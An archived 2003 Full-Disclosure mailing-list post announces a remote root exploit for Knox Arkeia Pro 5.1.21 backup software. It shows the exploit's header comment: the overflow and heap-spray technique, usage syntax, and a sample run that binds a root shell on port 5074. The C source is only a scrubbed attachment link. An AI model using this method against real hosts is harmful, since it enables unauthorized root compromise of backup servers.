| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20030919173643.84384.qmail@web20502.mail.yahoo.com> From: bugtraq_vuln at yahoo.com (A. C.) Subject: Knox Arkeia 5.1.21 local/remote root exploit Exploit attached for Knox Arkeia Pro v5.1.21 backup software from http://www.arkeia.com. /* * Knox Arkiea arkiead local/remote root exploit. * * Portbind 5074 shellcode * * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable. * * NULLs out least significant byte of EBP to pull EIP out of overflow buffer. * A previous request forces a large allocation of NOP's + shellcode in heap * memory. Find additional targets by searching the heap for NOP's after a * crash. safeaddr must point to any area of memory that is read/writable * and won't mess with program/shellcode flow. * * ./ark_sink host targetnum * [user@...t dir]$ ./ark_sink 192.168.1.2 1 * [*] Connected to 192.168.1.2:617 * [*] Connected to 192.168.1.2:617 * [*] Sending nops+shellcode * [*] Done, sleeping * [*] Sending overflow * [*] Done * [*] Sleeping and connecting remote shell * [*] Connected to 192.168.1.2:5074 * [*] Success, enjoy * id * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) * * */ __________________________________ Do you Yahoo!? Yahoo! SiteBuilder - Free, easy-to-use web site design software http://sitebuilder.yahoo.com -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: ark_sink.c Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030919/ab22d1b4/ark_sink.c
Powered by blists - more mailing lists